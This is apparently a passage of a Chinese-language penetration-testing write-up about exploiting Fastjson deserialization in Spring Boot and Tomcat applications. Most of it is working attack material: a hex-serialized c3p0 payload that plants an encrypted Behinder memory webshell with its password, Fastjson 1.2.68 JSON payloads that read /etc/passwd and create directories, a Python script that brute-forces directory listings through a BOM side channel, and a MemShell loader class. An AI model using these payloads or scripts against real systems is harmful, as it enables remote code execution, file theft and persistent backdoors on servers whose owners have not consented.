            java.lang.reflect.Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
            define.setAccessible(true);
            Class uclass = null;
            try {
                uclass = cl.loadClass("U");
            } catch (ClassNotFoundException e) {
                uclass = (Class) define.invoke(cl, bytecode, 0, bytecode.length);
            }
            Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class);
            constructor.setAccessible(true);
            Object u = constructor.newInstance(this.getClass().getClassLoader());
            Method Um = uclass.getDeclaredMethod("g", byte[].class);
            Um.setAccessible(true);
            String k = pa;
            session.setAttribute("u", k);
            Cipher c = Cipher.getInstance("AES");
            c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
            byte[] eClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));
            Class eclass = (Class) Um.invoke(u, eClassBytes);
            Object a = eclass.newInstance();
            Method b = eclass.getDeclaredMethod("equals", Object.class);
            b.setAccessible(true);
            b.invoke(a, pageContext);
            return;
        }catch (Exception ig){
            //ig.printStackTrace();
        }
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

将其编译为RcememShell.class文件,然后同样修改一下Test.java中的路径。

获取到的结果为:

1
2
3
4
5
6
7
8
9
10
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"
    },
    "b":{
        "@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",
        "userOverridesAsString":"HexAsciiSerializedMap:aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d657400124c6a6176612f6c616e672f537472696e673b4c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e00200007870000024d3cafebabe0000003401870a005e00cb0800cc09002d00cd0700ce0700cf0b000400d00700d10a000700cb08007e0b004a00d208007a08007c0a00d300d40a00d300d50b000400d60800d70a00d800d90a002400da0a001c00db0a001c00dc0800dd0a002d00de0b00df00e00a00e100e20800e30a00e400e50800e60700e70700a20900e800e90a001c00ea0a00eb00ec0800ed0a002700ee0700ef0700f00a00e800f10a00eb00f20700f30a001c00f40a00f500ec0a001c00f60a00f500f70800f80700f908009b0b00fa00fb0800fc0a00fd00fe0700ff0a00d801000a003201010a00fd01020701030a003600cb0b000401040a010501060a003601070a00fd01080a001c010908010a07010b08010c07010d0a0040010e0b010f01100701110801120a001c01130800c80a001c01140a011500ec0a011501160701170b004a01160a002d00cb0701180a004d00cb0a004d01190a004d011a0a004d011b0a0043011c07011d0a005300cb08011e0a0053011f0a0053011a09012001210a012001220a005301230a0043012407012507012607012707012801000270610100124c6a6176612f6c616e672f537472696e673b01000d436f6e7374616e7456616c75650100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301000d4c5263656d656d5368656c6c3b010004696e697401001f284c6a617661782f736572766c65742f46696c746572436f6e6669673b295601000c66696c746572436f6e66696701001c4c6a617661782f736572766c65742f46696c746572436f6e6669673b01000a457863657074696f6e73070129010008646f46696c74657201005b284c6a617661782f736572766c65742f536572766c6574526571756573743b4c6a617661782f736572766c65742f536572766c6574526573706f6e73653b4c6a617661782f736572766c65742f46696c746572436861696e3b29560100064c636c6173730100114c6a6176612f6c616e672f436c6173733b01000e736572766c65745265717565737401001e4c6a617661782f736572766c65742f536572766c6574526571756573743b01000f736572766c6574526573706f6e736501001f4c6a617661782f736572766c65742f536572766c6574526573706f6e73653b01000b66696c746572436861696e01001b4c6a617661782f736572766c65742f46696c746572436861696e3b010007726571756573740100274c6a617661782f736572766c65742f687474702f48747470536572766c6574526571756573743b010008726573706f6e73650100284c6a617661782f736572766c65742f687474702f48747470536572766c6574526573706f6e73653b01000773657373696f6e0100204c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b01000b70616765436f6e7465787401000f4c6a6176612f7574696c2f4d61703b010002636c0100174c6a6176612f6c616e672f436c6173734c6f616465723b0100164c6f63616c5661726961626c65547970655461626c650100354c6a6176612f7574696c2f4d61703c4c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f4f626a6563743b3e3b01000d537461636b4d61705461626c650700f907012a07012b07012c0700ce0700cf07012d0701170700f307012e01000764657374726f79010009527573685468657265010081284c6a6176612f6c616e672f436c6173733b4c6a6176612f6c616e672f436c6173734c6f616465723b4c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b4c6a617661782f736572766c65742f687474702f48747470536572766c6574526571756573743b4c6a6176612f7574696c2f4d61703b2956010001650100224c6a6176612f6c616e672f436c6173734e6f74466f756e64457863657074696f6e3b010006646566696e6501001a4c6a6176612f6c616e672f7265666c6563742f4d6574686f643b01000675636c61737301000b636f6e7374727563746f7201001f4c6a6176612f6c616e672f7265666c6563742f436f6e7374727563746f723b010001750100124c6a6176612f6c616e672f4f626a6563743b010002556d0100016b010001630100154c6a617661782f63727970746f2f4369706865723b01000b65436c61737342797465730100025b4201000665636c617373010001610100016201000862797465636f64650700e707012f0700ef07010b0100095369676e61747572650100a7284c6a6176612f6c616e672f436c6173733b4c6a6176612f6c616e672f436c6173734c6f616465723b4c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b4c6a617661782f736572766c65742f687474702f48747470536572766c6574526571756573743b4c6a6176612f7574696c2f4d61703c4c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f4f626a6563743b3e3b29560100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0701300100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100083c636c696e69743e01000666696c7465720100164c6a617661782f736572766c65742f46696c7465723b01000966696c7465724465660100314c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724465663b01000966696c7465724d61700100314c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724d61703b0100324c6f72672f6170616368652f636174616c696e612f636f72652f4170706c69636174696f6e46696c746572436f6e6669673b0100046e616d65010015776562617070436c6173734c6f61646572426173650100324c6f72672f6170616368652f636174616c696e612f6c6f616465722f576562617070436c6173734c6f61646572426173653b01000f7374616e64617264436f6e7465787401002a4c6f72672f6170616368652f636174616c696e612f636f72652f5374616e64617264436f6e746578743b010007436f6e666967730100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000d66696c746572436f6e6669677301000a536f7572636546696c650100105263656d656d5368656c6c2e6a6176610c00630064010010336164326664646665386261643865360c006000610100256a617661782f736572766c65742f687474702f48747470536572766c6574526571756573740100266a617661782f736572766c65742f687474702f48747470536572766c6574526573706f6e73650c013101320100116a6176612f7574696c2f486173684d61700c013301340701350c013601370c013801390c013a013b010004504f535407013c0c010a013d0c013e013f0c0140013f0c0141013b0100156a6176612e6c616e672e436c6173734c6f616465720c0092009307012c0c007001420701430c0144014701026479763636766741414144514147676f41424141554367414541425548414259484142634241415938615735706444344241426f6f54477068646d4576624746755a7939446247467a633078765957526c636a73705667454142454e765a4755424141394d6157356c546e5674596d5679564746696247554241424a4d62324e6862465a68636d6c68596d786c56474669624755424141523061476c7a415141445446553741514142597745414630787159585a684c327868626d63765132786863334e4d6232466b5a584937415141425a7745414653686251696c4d616d4632595339735957356e4c304e7359584e7a4f7745414157494241414a6251674541436c4e7664584a6a5a555a706247554241415a564c6d7068646d454d41415541426777414741415a415141425651454146577068646d4576624746755a7939446247467a633078765957526c636745414332526c5a6d6c755a554e7359584e7a415141584b46744353556b7054477068646d4576624746755a7939446247467a637a734149514144414151414141414141414941414141464141594141514148414141414f67414341414941414141474b6975334141477841414141416741494141414142674142414141414167414a4141414146674143414141414267414b4141734141414141414159414441414e414145414151414f41413841415141484141414150514145414149414141414a4b6973444b37363341414b7741414141416741494141414142674142414141414177414a4141414146674143414141414351414b414173414141414141416b4145414152414145414151415341414141416741540701480c0149014a01000b646566696e65436c61737301000f6a6176612f6c616e672f436c61737307014b0c014c00730c014d014e07012f0c014f0150010001550c015101520100206a6176612f6c616e672f436c6173734e6f74466f756e64457863657074696f6e0100106a6176612f6c616e672f4f626a6563740c015301540c015501560100156a6176612f6c616e672f436c6173734c6f616465720c015701580701590c015a01390c015b015c0100016701000b5263656d656d5368656c6c07012d0c015d015e01000341455307015f0c0160016101001f6a617661782f63727970746f2f737065632f5365637265744b6579537065630c016201630c006301640c006a016501001673756e2f6d6973632f4241534536344465636f6465720c016601670701680c0169013b0c016a014a0c016b016c0c015b016d010006657175616c730100136a6176612f6c616e672f457863657074696f6e01000c4175746f6d6e6547726565740100306f72672f6170616368652f636174616c696e612f6c6f616465722f576562617070436c6173734c6f61646572426173650c016e016f0701700c017101720100286f72672f6170616368652f636174616c696e612f636f72652f5374616e64617264436f6e746578740100286f72672e6170616368652e636174616c696e612e636f72652e5374616e64617264436f6e746578740c017301520c017401750701760c0177017801000d6a6176612f7574696c2f4d617001002f6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724465660c0179017a0c017b017c0c017d017c0c017e017f01002f6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724d61700100022f2a0c0180017c0701810c018201830c00c1013b0c0184017c0c018501860100306f72672f6170616368652f636174616c696e612f636f72652f4170706c69636174696f6e46696c746572436f6e66696701001b6f72672f6170616368652f636174616c696e612f436f6e74657874010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100146a617661782f736572766c65742f46696c74657201001e6a617661782f736572766c65742f536572766c6574457863657074696f6e01001c6a617661782f736572766c65742f536572766c65745265717565737401001d6a617661782f736572766c65742f536572766c6574526573706f6e73650100196a617661782f736572766c65742f46696c746572436861696e01001e6a617661782f736572766c65742f687474702f4874747053657373696f6e0100136a6176612f696f2f494f457863657074696f6e0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01000a67657453657373696f6e01002228294c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b010003707574010038284c6a6176612f6c616e672f4f626a6563743b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010015676574436f6e74657874436c6173734c6f6164657201001928294c6a6176612f6c616e672f436c6173734c6f616465723b0100096765744d6574686f6401001428294c6a6176612f6c616e672f537472696e673b0100106a6176612f6c616e672f537472696e67010015284c6a6176612f6c616e672f4f626a6563743b295a010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b01000d6765745375706572636c6173730100076765744e616d65010040284c6a617661782f736572766c65742f536572766c6574526571756573743b4c6a617661782f736572766c65742f536572766c6574526573706f6e73653b29560100106a6176612f7574696c2f42617365363401000a6765744465636f6465720100074465636f64657201000c496e6e6572436c617373657301001c28294c6a6176612f7574696c2f426173653634244465636f6465723b0100186a6176612f7574696c2f426173653634244465636f6465720100066465636f6465010016284c6a6176612f6c616e672f537472696e673b295b420100116a6176612f6c616e672f496e7465676572010004545950450100116765744465636c617265644d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b01000d73657441636365737369626c65010004285a29560100096c6f6164436c617373010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b01000776616c75654f660100162849294c6a6176612f6c616e672f496e74656765723b010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100166765744465636c61726564436f6e7374727563746f72010033285b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f436f6e7374727563746f723b01001d6a6176612f6c616e672f7265666c6563742f436f6e7374727563746f7201000e676574436c6173734c6f6164657201000b6e6577496e7374616e6365010027285b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b01000c736574417474726962757465010027284c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f4f626a6563743b29560100136a617661782f63727970746f2f43697068657201000b676574496e7374616e6365010029284c6a6176612f6c616e672f537472696e673b294c6a617661782f63727970746f2f4369706865723b010008676574427974657301000428295b42010017285b424c6a6176612f6c616e672f537472696e673b295601001728494c6a6176612f73656375726974792f4b65793b295601000967657452656164657201001a28294c6a6176612f696f2f42756666657265645265616465723b0100166a6176612f696f2f4275666665726564526561646572010008726561644c696e6501000c6465636f6465427566666572010007646f46696e616c010006285b42295b4201001428294c6a6176612f6c616e672f4f626a6563743b01000c6765745265736f757263657301002728294c6f72672f6170616368652f636174616c696e612f5765625265736f75726365526f6f743b0100236f72672f6170616368652f636174616c696e612f5765625265736f75726365526f6f7401000a676574436f6e7465787401001f28294c6f72672f6170616368652f636174616c696e612f436f6e746578743b010007666f724e616d650100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c64010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b01000973657446696c746572010019284c6a617661782f736572766c65742f46696c7465723b295601000d73657446696c7465724e616d65010015284c6a6176612f6c616e672f537472696e673b295601000e73657446696c746572436c61737301000c61646446696c746572446566010034284c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724465663b295601000d61646455524c5061747465726e01001c6a617661782f736572766c65742f44697370617463686572547970650100075245515545535401001e4c6a617661782f736572766c65742f44697370617463686572547970653b01000d7365744469737061746368657201001261646446696c7465724d61704265666f7265010034284c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724d61703b29560021002d005e0001005f00010012006000610001006200000002000200080001006300640001006500000039000200010000000b2ab700012a1202b50003b10000000200660000000a00020000001a0004001b00670000000c00010000000b0068006900000001006a006b00020065000000350000000200000001b10000000200660000000600010000004600670000001600020000000100680069000000000001006c006d0001006e000000040001006f00010070007100020065000003150006000a000001ab2bc000043a042cc000053a051904b9000601003a06bb000759b700083a07190712091906b9000a0300571907120b1904b9000a0300571907120c1905b9000a030057b8000db6000e3a081904b9000f01001210b600119901541908b60012b60013b600141215b6001199001e1908b60012b600133a092a19091908190619041907b60016a7011e1908b60012b60013b60013b600141215b600119900211908b60012b60013b600133a092a19091908190619041907b60016a700ea1908b60012b60013b60013b60013b600141215b600119900241908b60012b60013b60013b600133a092a19091908190619041907b60016a700b01908b60012b60013b60013b60013b60013b600141215b600119900271908b60012b60013b60013b60013b600133a092a19091908190619041907b60016a700701908b60012b60013b60013b60013b60013b60013b600141215b6001199002a1908b60012b60013b60013b60013b60013b600133a092a19091908190619041907b60016a7002a1908b60012b60013b60013b60013b60013b60013b600133a092a19091908190619041907b600162d2b2cb900170300b100000004006600000076001d0000004a0006004b000c004c0015004e001e004f002a00500036005100420053004a005500590056006c00570076005800840059009d005a00aa005b00b8005c00d4005d00e4005e00f2005f01110060012400610132006201540063016a006401780065017b00660194006701a2006901aa006b006700000098000f0076000e00720073000900aa000e00720073000900e4000e0072007300090124000e007200730009016a000e0072007300090194000e007200730009000001ab006800690000000001ab007400750001000001ab007600770002000001ab007800790003000601a5007a007b0004000c019f007c007d000500150196007e007f0006001e018d008000810007004a016100820083000800840000000c0001001e018d00800085000700860000002c0007ff0087000907008707008807008907008a07008b07008c07008d07008e07008f000033393ffb00452607006e0000000600020090006f000100910064000100650000002b0000000100000001b10000000200660000000600010000007000670000000c00010000000100680069000000010092009300020065000002e20006001200000131b800181219b6001a3a062b121b06bd001c5903121d535904b2001e535905b2001e53b6001f3a07190704b60020013a082c1221b600223a08a700293a0919072c06bd00245903190653590403b800255359051906beb8002553b60026c0001c3a08190804bd001c5903122753b600283a09190904b60029190904bd002459032ab60012b6002a53b6002b3a0a1908122c04bd001c5903121d53b6001f3a0b190b04b6002012023a0c2d122e190cb9002f03001230b800313a0d190d05bb003259190cb600331230b70034b60035190dbb003659b700371904b900380100b60039b6003ab6003b3a0e190b190a04bd00245903190e53b60026c0001c3a0f190fb6003c3a10190f123d04bd001c5903122453b6001f3a11191104b600201911191004bd00245903190553b6002657b13a07b1000200300038003b0023000a012d012e003e000400660000006a001a00000073000a007500270076002d0077003000790038007c003b007a003d007b0061007d0071007e0077007f008c0080009e008100a4008200a8008300b2008400b9008500cd008600e8008700fd0088010400890116008a011c008b012d008c012e008d013000900067000000c00013003d002400940095000900270107009600970007003000fe009800730008007100bd0099009a0009008c00a2009b009c000a009e0090009d0097000b00a80086009e0061000c00b90075009f00a0000d00e8004600a100a2000e00fd003100a30073000f0104002a00a4009c00100116001800a50097001100000131006800690000000001310072007300010000013100820083000200000131007e007f000300000131007a007b000400000131008000810005000a012700a600a2000600840000000c0001000001310080008500050086000000470003ff003b00090700870700a707008f07008d07008b07008e07001d0700a80700a700010700a925ff00cc00070700870700a707008f07008d07008b07008e07001d00010700aa00ab0000000200ac000100ad00ae000200650000003f0000000300000001b1000000020066000000060001000000950067000000200003000000010068006900000000000100af00b000010000000100b100b20002006e00000004000100b3000100ad00b400020065000000490000000400000001b10000000200660000000600010000009a00670000002a0004000000010068006900000000000100af00b000010000000100b500b600020000000100b700b80003006e00000004000100b3000800b9006400010065000001da0005000a000000de123f4bb8000db6000ec000404c2bb60041b900420100c000434d1244b800451246b600474e2d04b600482d2cb60049c0004a3a041904123fb9004b0200c7009cbb002d59b7004c3a05bb004d59b7004e3a0619061905b6004f1906123fb6005019061905b60012b60014b600512c1906b60052bb005359b700543a0719071255b600561907123fb600571907b20058b60059b6005a2c1907b6005b125c05bd001c5903125d535904124d53b600283a08190804b60029190805bd002459032c535904190653b6002bc0005c3a091904123f1909b9000a030057a700044bb10001000000d900dc003e000300660000006600190000001f00030020000d0021001a002300250024002a002500340027004000280049002a0052002b0059002c0060002d006d002f00730031007c003200830033008a003400950036009b003800b0003900b6003a00cd003c00d9004000dc003e00dd0041006700000066000a0049009000ba00bb00050052008700bc00bd0006007c005d00be00bf000700b000290099009a000800cd000c006c00c00009000300d600c100610000000d00cc00c200c30001001a00bf00c400c50002002500b400c600c70003003400a500c80081000400860000000a0003fb00d9420700aa00000200c90000000200ca01460000000a000100e400e101450009707400013170770100787372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d65737361676571007e00055b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0014707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000027372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654e616d6571007e00054c000a6d6574686f644e616d6571007e000578700000002774000454657374740009546573742e6a61766174000367656e7371007e00170000000f71007e001971007e001a7400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e00137872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e0023787372001e636f6d2e616c69626162612e666173746a736f6e2e4a534f4e417272617900000000000000010200014c00046c69737471007e001378707371007e00220000000177040000000171007e00077878;",
    }
}

然后和普通马一样的绕过。然后使用冰蝎连接,密码为:goautomne

image-20251031183130877

fastjson1.2.68不出网的writefile漏洞

第一步,老样子,探测fastjson的版本1.2.68

image-20251031210923922

要想写文件就要看后端使用了哪些依赖了。不是jdk11。

image-20251031220354558

继续探测。org.springframework.web.bind.annotation.RequestMapping存在,是springboot

image-20251031223157170

继续探测。发现org.apache.commons.io.Charsets存在,根据FastJson漏洞学习[6],有文件读取的可能性了。

image-20251031220933447

再继续探测。发现想去使用jdbc打反序列化,相关依赖都不存在,这个也是不行的。

1
2
3
com.mysql.jdbc.Buffer  //mysql-jdbc-5
com.mysql.cj.api.authentication.AuthenticationProvider  //mysql-connect-6
com.mysql.cj.protocol.AuthenticationProvider //mysql-connect-8

image-20251031221611172

试一试读文件,发现是可行的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
{
  "abc": {
    "@type": "java.lang.AutoCloseable",
    "@type": "org.apache.commons.io.input.BOMInputStream",
    "delegate": {
      "@type": "org.apache.commons.io.input.ReaderInputStream",
      "reader": {
        "@type": "jdk.nashorn.api.scripting.URLReader",
        "url": "file:///etc/passwd"
      },
      "charsetName": "UTF-8",
      "bufferSize": 1024
    },
    "boms": [
      {
        "charsetName": "UTF-8",
        "bytes": [
          114,111,111,116
        ]
      }
    ]
  },
  "address": {
    "@type": "java.lang.AutoCloseable",
    "@type": "org.apache.commons.io.input.CharSequenceReader",
    "charSequence": {
      "@type": "java.lang.String"{"$ref":"$.abc.BOM[0]"},
    "start": 0,
    "end": 0
  }
}
}

image-20251031222027561

既然读文件可以了,那么尝试去进行写文件,看看可不可行。

写文件进行RCE[7][8],有几种方式:

  • 写入jsp文件
  • 写入计划任务反弹shell
  • 写入charsets.jar加载jar
  • 写入class类加载

这几种方法的详细利用可参考[8:1]

springboot,第一个写入jsp文件,直接pass了。不出网环境,写入计划任务肯定也是不行的。写入charsets.jar加载jar包,对于这个方法charsets.jar加载只能加载一次,也就是说如果服务本身就调动过该jar包就不奏效[8:2],限制太强了。

那么就是最后一个写入class类加载了,试一试去实现。

文件读取列目录

现在的问题是,写入的class类的真实路径是什么?这里就用到文件读取,使用文件读取去列目录,找真实路径。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
import requests

url = "http://192.168.1.101/login"

#码表可按照实际修改,例如探测jdk目录一般文件名为小写
#asciis = [10,32,45,46,47,48,49,50,51,52,53,54,55,56,57,91,92,95,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122] #针对linux下正常文件夹或文件读取,去除了一些文件名下不常见的字符,且全为小写 
asciis = [10,32,45,46,47,48,49,50,51,52,53,54,55,56,57,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,95,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122] #针对linux下正常文件夹或文件读取,去除了一些文件名下不常见的字符,且包含大小写 
# asciis = [10,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126] #所有可见字符


data1 = """
{
    "abc": {
				"@type": "java.lang.AutoCloseable",
        "@type": "org.apache.commons.io.input.BOMInputStream",
        "delegate": {
            "@type": "org.apache.commons.io.input.ReaderInputStream",
            "reader": {
                "@type": "jdk.nashorn.api.scripting.URLReader",
                "url": "file:///usr/lib/jvm/"
            },
            "charsetName": "UTF-8",
            "bufferSize": 1024
        },
        "boms": [
            {
                "charsetName": "UTF-8",
                "bytes": [
"""  

data2 = """
                ]
            }
        ]
    },
    "address": {
        "@type": "java.lang.AutoCloseable",
        "@type": "org.apache.commons.io.input.CharSequenceReader",
        "charSequence": {
            "@type": "java.lang.String"{"$ref":"$.abc.BOM[0]"},
            "start": 0,
            "end": 0
        }
    }
}
"""
proxies = {
    'http': '127.0.0.1:8080',
}

header = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36",
    "Content-Type": "application/json; charset=utf-8"
}

def byte2str(bytes):
    file_str = ""
    for i in file_byte:
        file_str += chr(int(i))
    print("【" + file_str + "】")

file_byte = []
for i in range(0,50):  # 需要读取多长自己定义,但一次性不要太长,建议分多次读取
    for i in asciis:
        file_byte.append(str(i))
        req = requests.post(url=url,data=(data1+','.join(file_byte)+data2).encode('utf-8'),headers=header)
        text = req.text
        
        if "charSequence" not in text:
            file_byte.pop()
    byte2str(file_byte) 
print(file_byte)

读取file:///usr/lib/jvm/,查看真实路径为java-1.8.0-openjdk-1.8.0.412.b08-1.el7_9.aarch64

image-20251101161600604

再去读路径,发现了file:///usr/lib/jvm/java-1.8.0-openjdk-1.8.0.412.b08-1.el7_9.aarch64/

image-20251101162629415

再继续读路径file:///usr/lib/jvm/java-1.8.0-openjdk-1.8.0.412.b08-1.el7_9.aarch64/jre/

image-20251101163148768

这里是发现存在classes目录,有时候是不存在的。不存在的时候就去创建一个classes目录。

创建classes目录

针对不存在的classes目录,这里因为我的环境中已经存在了这个目录,我就创建一个testclasses目录去演示目录的创建。

构造数据包如下,换一个创建的目录的地址。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
{
 "@type":"java.lang.AutoCloseable",
 "@type":"org.apache.commons.io.output.WriterOutputStream",
 "writer":{
 "@type":"org.apache.commons.io.output.LockableFileWriter",
 "file":"/etc/passwd",
 "encoding":"UTF-8",
 "append": true,
"lockDir":"/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.412.b08-1.el7_9.aarch64/jre/testclasses" 
 },
 "charset":"UTF-8",
 "bufferSize": 8193,
 "writeImmediately": true
 }

image-20251101164024543

再去列一下目录,发现成功创建了testclasses文件夹。

image-20251101164145281

编写class类

对于不出网的环境,最好的方式就是打内存马了。

首先生成冰蝎内存马

image-20251101175845480

对应的MemShell.java的文件为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import java.io.IOException;

public class MemShell implements AutoCloseable {
    static {
        String bytecodeBase64 = "yv66vgAAADEBewEAIm9yZy9h..."; //写生成的冰蝎马
        ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
        try {
            classLoader.loadClass("org.apache.logging.e.EncryptionUtil").newInstance();
        } catch (Exception e) {
            try {
                java.lang.reflect.Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
                defineClass.setAccessible(true);
                byte[] bytecode = null;
                try {
                    Class base64Clz = classLoader.loadClass("java.util.Base64");
                    java.lang.reflect.Method getDecoderMethod = base64Clz.getMethod("getDecoder");
                    Object decoder = getDecoderMethod.invoke(null);
                    java.lang.reflect.Method decodeMethod = decoder.getClass().getMethod("decode", String.class);
                    bytecode = (byte[]) decodeMethod.invoke(decoder, bytecodeBase64);
                } catch (ClassNotFoundException ee) {
                    Class datatypeConverterClz = classLoader.loadClass("javax.xml.bind.DatatypeConverter");
                    java.lang.reflect.Method parseBase64BinaryMethod = datatypeConverterClz.getMethod("parseBase64Binary", String.class);
                    bytecode = (byte[]) parseBase64BinaryMethod.invoke(null, bytecodeBase64);
                }
                Class clazz = (Class) defineClass.invoke(classLoader, bytecode, 0, bytecode.length);
                clazz.newInstance();
            } catch (Exception ex) {
                ex.printStackTrace();
            }
        }
    }
    @Override public void close() throws Exception { }
}

